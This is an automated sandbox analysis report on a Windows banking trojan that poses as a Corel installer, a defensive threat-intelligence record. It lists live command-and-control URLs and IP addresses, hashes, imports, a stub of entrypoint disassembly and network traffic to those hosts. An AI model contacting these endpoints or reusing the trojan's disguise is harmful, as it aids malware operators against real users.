https://46.101.175.170:10172/L	K9jgh4owKk.exe, 00000000.00000003.396193564.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.430727069.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.437511417.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.444196322.0000000000827000.00000004.00000001.sdmp	false		unknown
https://103.9.36.172/t	K9jgh4owKk.exe, 00000000.00000003.498833996.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463782631.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.511479825.0000000000827000.00000004.00000020.sdmp, K9jgh4owKk.exe, 00000000.00000003.430727069.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476796082.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.483986043.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.437511417.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506063959.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.444196322.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170:10172/a	K9jgh4owKk.exe, 00000000.00000003.338347874.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349485775.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.336677145.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.444272579.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.498872671.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.430945199.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463838545.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.342457886.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476853326.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491355139.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.437583136.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.396300883.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.484043126.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.403718756.00000000030CD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.101.175.170:10172/r3	K9jgh4owKk.exe, 00000000.00000003.396300883.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.403718756.00000000030CD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.9.36.172/x	K9jgh4owKk.exe, 00000000.00000003.356858095.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349116394.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://103.9.36.172/rsaenh.dll	K9jgh4owKk.exe, 00000000.00000003.261873587.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349116394.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.483986043.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261835900.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.304411755.0000000000827000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
46.101.175.170	unknown	Netherlands	14061	DIGITALOCEAN-ASNUS	true
103.70.29.126	unknown	Viet Nam	63761	MAXDATA-VNCongtyTNHHDichvutructuyenMaxdataVN	true
103.9.36.172	unknown	Indonesia	131710	IDNIC-AERONET-AS-IDPTAeroSystemsIndonesiaID	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	546752
Start date:	31.12.2021
Start time:	09:51:13
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	K9jgh4owKk.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.evad.winEXE@1/2@0/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 4.6% (good quality ratio 4.6%) Quality average: 79.9% Quality standard deviation: 15.6%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 178.79.225.128, 173.222.108.210, 173.222.108.226 Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, wu-shim.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:52:15	API Interceptor	109x Sleep call for process: K9jgh4owKk.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
46.101.175.170	U57z89iyVo.exe	Get hash	malicious	Browse
103.70.29.126	U57z89iyVo.exe	Get hash	malicious	Browse
103.9.36.172	U57z89iyVo.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
windowsupdate.s.llnwi.net	MbTiTDjEXs.exe	Get hash	malicious	Browse	95.140.236.128
	Proforma Invoice.exe	Get hash	malicious	Browse	178.79.242.0
	figures-12.15.2021.doc	Get hash	malicious	Browse	178.79.225.0
	idWfH7cKYK.dll	Get hash	malicious	Browse	178.79.225.0
	Payment advice.doc	Get hash	malicious	Browse	41.63.96.128
	ga9nOfSSCM.exe	Get hash	malicious	Browse	178.79.242.0
	QOfxgK3gFF.exe	Get hash	malicious	Browse	95.140.236.128
	GtNkLD6ILs.exe	Get hash	malicious	Browse	41.63.96.128
	Non disclosure Agreement & ITB docs,pdf.exe	Get hash	malicious	Browse	178.79.225.0
	zH1061Guix.exe	Get hash	malicious	Browse	178.79.242.0
	gBBIgwvKE3.doc	Get hash	malicious	Browse	178.79.225.0
	FARIDA GHCU123.doc	Get hash	malicious	Browse	178.79.242.0
	Bank Fund Transfer8300006139 2021.exe	Get hash	malicious	Browse	95.140.236.0
	official paper 12.010.21.doc	Get hash	malicious	Browse	178.79.242.128
	Shipment reminder 9487464738.exe	Get hash	malicious	Browse	178.79.242.128
	New Order.exe	Get hash	malicious	Browse	178.79.242.0
	order-12.21.doc	Get hash	malicious	Browse	178.79.225.0
	DOC_58771363950497404.xlsm	Get hash	malicious	Browse	178.79.225.0
	ra451LHPrx.dll	Get hash	malicious	Browse	178.79.242.0

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MAXDATA-VNCongtyTNHHDichvutructuyenMaxdataVN	U57z89iyVo.exe	Get hash	malicious	Browse	103.70.29.126
IDNIC-AERONET-AS-IDPTAeroSystemsIndonesiaID	U57z89iyVo.exe	Get hash	malicious	Browse	103.9.36.172
DIGITALOCEAN-ASNUS	UvGeBNTPpT.exe	Get hash	malicious	Browse	188.166.49.116
	U57z89iyVo.exe	Get hash	malicious	Browse	46.101.175.170
	hdQKNEaz1e.exe	Get hash	malicious	Browse	178.62.127.193
	Untitled 0912.xlsm	Get hash	malicious	Browse	128.199.192.135
	yB9IhcEMyw	Get hash	malicious	Browse	68.183.96.179
	v2.exe	Get hash	malicious	Browse	138.197.183.62
	x86	Get hash	malicious	Browse	64.225.9.3
	mblEcYJR5z	Get hash	malicious	Browse	138.68.122.108
	ak6K4nfbk8	Get hash	malicious	Browse	45.55.195.225
	nUkbOfIFrC.exe	Get hash	malicious	Browse	178.62.232.173
	2021.12.23 #4 205WESOLARES.pdf .exe	Get hash	malicious	Browse	206.189.227.19
	Toak330c3E.exe	Get hash	malicious	Browse	178.62.232.173
	q82hLqiJQ2.exe	Get hash	malicious	Browse	178.62.232.173
	k8i7NOaW5v.exe	Get hash	malicious	Browse	178.62.232.173
	H4HU4rg1NM.exe	Get hash	malicious	Browse	188.166.28.199
	4BfFNMA5mb.exe	Get hash	malicious	Browse	188.166.28.199
	2esp3jydWv.exe	Get hash	malicious	Browse	188.166.28.199
	jCeYwcgr5J.exe	Get hash	malicious	Browse	188.166.28.199
	LdHUtWJP0t.exe	Get hash	malicious	Browse	188.166.28.199
	a253ieOlKV.exe	Get hash	malicious	Browse	188.166.28.199

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
51c64c77e60f3980eea90869b68c58a8	U57z89iyVo.exe	Get hash	malicious	Browse	103.9.36.172
	rFChS2cBbK.dll	Get hash	malicious	Browse	103.9.36.172
	date6.dll	Get hash	malicious	Browse	103.9.36.172
	SecuriteInfo.com.Win64.Kryptik.CUI.27192.dll	Get hash	malicious	Browse	103.9.36.172
	3mym0OCj3G.dll	Get hash	malicious	Browse	103.9.36.172
	mlbwnwvwxp.dll	Get hash	malicious	Browse	103.9.36.172
	mlbwnwvwxp.dll	Get hash	malicious	Browse	103.9.36.172
	u3pwH2rdhh.dll	Get hash	malicious	Browse	103.9.36.172
	sD38AZFcDx.dll	Get hash	malicious	Browse	103.9.36.172
	u3pwH2rdhh.dll	Get hash	malicious	Browse	103.9.36.172
	sD38AZFcDx.dll	Get hash	malicious	Browse	103.9.36.172
	best.dll	Get hash	malicious	Browse	103.9.36.172
	best.dll	Get hash	malicious	Browse	103.9.36.172
	u35vHcdxuH.exe	Get hash	malicious	Browse	103.9.36.172
	Hs0ExJaelk.exe	Get hash	malicious	Browse	103.9.36.172
	hpgwQPiZFj.exe	Get hash	malicious	Browse	103.9.36.172
	I4gUMZH8oF.dll	Get hash	malicious	Browse	103.9.36.172
	XEjLRpNx4J.dll	Get hash	malicious	Browse	103.9.36.172
	8Lp5yoZ6B4.dll	Get hash	malicious	Browse	103.9.36.172
	7bA7UknK6b.dll	Get hash	malicious	Browse	103.9.36.172

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\Desktop\K9jgh4owKk.exe
File Type:	Microsoft Cabinet archive data, 61414 bytes, 1 file
Category:	dropped
Size (bytes):	61414
Entropy (8bit):	7.995245868798237
Encrypted:	true
SSDEEP:	1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
MD5:	ACAEDA60C79C6BCAC925EEB3653F45E0
SHA1:	2AAAE490BCDACCC6172240FF1697753B37AC5578
SHA-256:	6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
SHA-512:	FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF....f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.a..x..O..V.t..Y1!.T..`U...-...< _@...\|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\Desktop\K9jgh4owKk.exe
File Type:	data
Category:	modified
Size (bytes):	290
Entropy (8bit):	2.9468995979464374
Encrypted:	false
SSDEEP:	6:kKIp5SN+SkQlPlEGYRMY9z+4KlDA3RUe/:OHkPlE99SNxAhUe/
MD5:	61B0605F972049606BA48C2F01F2E641
SHA1:	E9E5C36F365C53B0D94F97BC8FB7A09F749CDEFB
SHA-256:	5F5A1D62F69A4944C0E12EF8FA659FB9AE451974038546DECB474D1B8C91E594
SHA-512:	B0AF64EF61FC072C99E33072881E0BC8A3760C8C0605302322F2E20DEB5B13783E3B3952CD91AE163DE40966BBF3EB728828D1F2E7B7E44670CA8A2A7AC9F3DB
Malicious:	false
Reputation:	low
Preview:	p...... ..........H.o...(....................................................... ........q.\].......................h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.694465584585278
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	K9jgh4owKk.exe
File size:	668672
MD5:	a5eb3426e582795b6393a328cd27bf94
SHA1:	a2494b972f175cadc7e3b43d67af4c7f7efebb19
SHA256:	67dd305f6e4cdfaa395ca06f30d971b8a0d4bf3926bfb140b258f0704b31f92b
SHA512:	39ede402f550cd8fbea9c54ded315cb7a3f79bdec7807b71e285068dee125e702b9af4f1877e3bd0b8bdcabb632d2abe0057f8632d1565e0f6cdee48f4a7cfac
SSDEEP:	6144:9oZ0CO9gNUkcYQySZi6GZf3wfWaLaYefOG2uttS6JIhNuttS6JIhz:WZ0tuQ0DZf3wcFVtrJIYtrJId
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a...............2............0&.......0....@..........................p.............................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x402630
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x61CADABE [Tue Dec 28 09:37:02 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	63ce49b1645eb1a9eea5e13edd6aa00f

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push ecx
mov dword ptr [ebp-04h], 00000000h
cmp dword ptr [ebp-04h], 00000000h
je 00007FAEC8C1CDFFh
push 0000D0E1h
call 00007FAEC8C1C92Ah
add esp, 04h
mov edx, dword ptr [ebp+08h]
mov dword ptr [004A3F44h], edx
mov dword ptr [004A3F2Ch], ebp
push 004A4040h
call dword ptr [004A459Ch]
call 00007FAEC8C1CAE8h
mov esp, ebp
pop ebp
ret
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa4044	0x8c	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa6000	0x70c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa4390	0x2c0	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1671	0x1800	False	0.265462239583	data	5.06554083977	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x3000	0x9a806	0x9aa00	False	0.558361648646	data	5.6883445947	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rdata2	0x9e000	0x1	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.data	0x9f000	0x637c	0x6400	False	0.576171875	PGP\011Secret Key -	5.29436476447	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xa6000	0x70c	0x800	False	0.37744140625	data	3.62963300542	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_RCDATA	0xa60a0	0x135	ASCII text, with very long lines, with no line terminators	English	United States
RT_VERSION	0xa61d8	0x534	data	English	Canada

Imports

DLL	Import
KERNEL32.dll	WriteProfileSectionA, GetEnvironmentStringsA, MoveFileExA, SetLocalTime, GetEnvironmentStrings, GetTickCount, GetVolumeInformationA, GetFileAttributesA, GetFullPathNameA, FileTimeToSystemTime, FileTimeToLocalFileTime, FindClose, FindFirstFileA, CloseHandle, SetFileTime, LocalFileTimeToFileTime, DosDateTimeToFileTime, CreateFileA, GetVersion, GetFileType, GetFileTime, ReadFile, SetConsoleMode, GetConsoleMode, FindNextFileA, GetLastError, HeapFree, HeapAlloc, GetProcessHeap, GetCurrentProcess, InitializeCriticalSection, ReleaseMutex, WaitForSingleObject, InterlockedExchange, CreateMutexA, lstrcpynA, GetDriveTypeA, lstrcmpiA, LeaveCriticalSection, EnterCriticalSection, lstrlenA, ExitProcess, GetProcAddress, GetModuleHandleA, TerminateProcess, SetConsoleCtrlHandler, GetSystemTimeAsFileTime, MultiByteToWideChar, MoveFileA, SetStdHandle, HeapReAlloc, GetCommandLineA, GetVersionExA, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, SetFilePointer, SetHandleCount, GetStdHandle, GetStartupInfoA, WriteFile, FlushFileBuffers, WideCharToMultiByte, UnhandledExceptionFilter, GetCPInfo, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, IsValidCodePage, GetStringTypeA, GetStringTypeW, SetEndOfFile, GetTimeZoneInformation, GetModuleFileNameA, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapSize, CompareStringA, CompareStringW, GetACP, GetOEMCP, GetLocaleInfoW, DeleteFileA, SetFileAttributesA, GetFileInformationByHandle, PeekNamedPipe, RemoveDirectoryA, SetEnvironmentVariableW, GetCurrentDirectoryA, GetExitCodeProcess, CreateProcessA, VirtualAllocEx
USER32.dll	DdeCreateStringHandleA, EnumDisplayDevicesA, GetPropA, MonitorFromWindow, IMPQueryIMEW, IsDialogMessage, LockSetForegroundWindow, CreateAcceleratorTableW, SystemParametersInfoW, GetClassLongA, RealGetWindowClassW, CopyRect, CreateWindowExW, DefDlgProcW, GetDlgCtrlID, LockWindowUpdate, UnpackDDElParam, GetClipboardOwner, TranslateMDISysAccel, ShowScrollBar, BroadcastSystemMessageW, CreateDialogIndirectParamA, InsertMenuA, EnableMenuItem, PostMessageW, GetWindowPlacement, GetCursorInfo, GetSystemMetrics, CallMsgFilterW, LoadCursorA, EnumThreadWindows, DdeQueryStringW, LoadIconW, GetWindowTextLengthA, CharUpperW, CharNextA, CharLowerA
GDI32.dll	EngMultiByteToWideChar, EnumICMProfilesW, GdiIsMetaFileDC, CreateHalftonePalette, SetTextJustification, GdiGetPageHandle, DeleteEnhMetaFile, GetFontUnicodeRanges, ExtCreateRegion, EngMultiByteToUnicodeN, GdiStartDocEMF, FONTOBJ_pxoGetXform, EngCreateDeviceBitmap, GetCharWidthA, SetStretchBltMode, EnumFontFamiliesA, SetWinMetaFileBits, EnumICMProfilesA, FontIsLinked, CLIPOBJ_ppoGetPath, HT_Get8BPPMaskPalette, GdiEntry3, DPtoLP, EudcLoadLinkW, CreateDIBSection, GdiAddFontResourceW, GetStockObject
ADVAPI32.dll	RegOpenKeyW
SHELL32.dll	SHGetFolderPathW, DragQueryFile, ShellHookProc, DoEnvironmentSubstW, SHGetFileInfo, ExtractAssociatedIconA, SHEmptyRecycleBinW, SHGetPathFromIDListW
SHLWAPI.dll	StrRStrIA, StrChrA

Version Infos

Description	Data
LegalCopyright	Copyright(c) 2007 Corel Corporation
InternalName	PropSchemasetip
FileVersion	1, 0, 0, 1
CompanyName	Corel Corporation
LegalTrademarks	Corel, CorelDRAW, Corel DESIGNER, Corel R.A.V.E., Corel PHOTO-PAINT, CorelTRACE and Corel CAPTURE are trademarks or registered trademarks of Corel Corporation and/or its subsidiaries in Canada, the U.S. and/or other countries.
ProductName	Corel Graphics Applications
ProductVersion	1, 0, 0, 1
FileDescription	Property Schema ikstaller
OriginalFilename	PropSchemasetip.exe
Translation	0x1009 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
English	Canada

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2021 09:52:14.284513950 CET	49757	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:14.284567118 CET	443	49757	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:14.284682989 CET	49757	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:14.305636883 CET	49757	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:14.305665016 CET	443	49757	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:14.889492035 CET	443	49757	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:14.889626026 CET	49757	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:15.149147034 CET	49757	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:15.149182081 CET	443	49757	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:15.149945974 CET	443	49757	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:15.150022030 CET	49757	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:15.170845985 CET	49757	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:15.170977116 CET	49757	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:15.171017885 CET	443	49757	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:15.980837107 CET	443	49757	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:15.980921030 CET	443	49757	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:15.981055021 CET	49757	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:15.981110096 CET	49757	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:15.985122919 CET	49757	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:15.985161066 CET	443	49757	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:16.137903929 CET	49758	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:16.325920105 CET	593	49758	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:16.326112032 CET	49758	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:16.326924086 CET	49758	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:16.514249086 CET	593	49758	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:16.517791033 CET	593	49758	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:16.517838955 CET	593	49758	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:16.517923117 CET	49758	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:16.517954111 CET	49758	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:17.841852903 CET	49758	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:18.029184103 CET	593	49758	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:18.030132055 CET	593	49758	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:18.030232906 CET	49758	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:18.030941010 CET	49758	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:18.031126022 CET	49758	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:18.218558073 CET	593	49758	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:18.218579054 CET	593	49758	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:18.687259912 CET	593	49758	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:18.687289953 CET	593	49758	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:18.687432051 CET	49758	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:18.687490940 CET	49758	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:18.690056086 CET	49758	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:18.878149033 CET	593	49758	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:18.919609070 CET	49760	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:18.949851036 CET	10172	49760	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:18.950572014 CET	49760	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:18.951442957 CET	49760	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:18.984246016 CET	10172	49760	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:18.992541075 CET	10172	49760	46.101.175.170	192.168.2.7
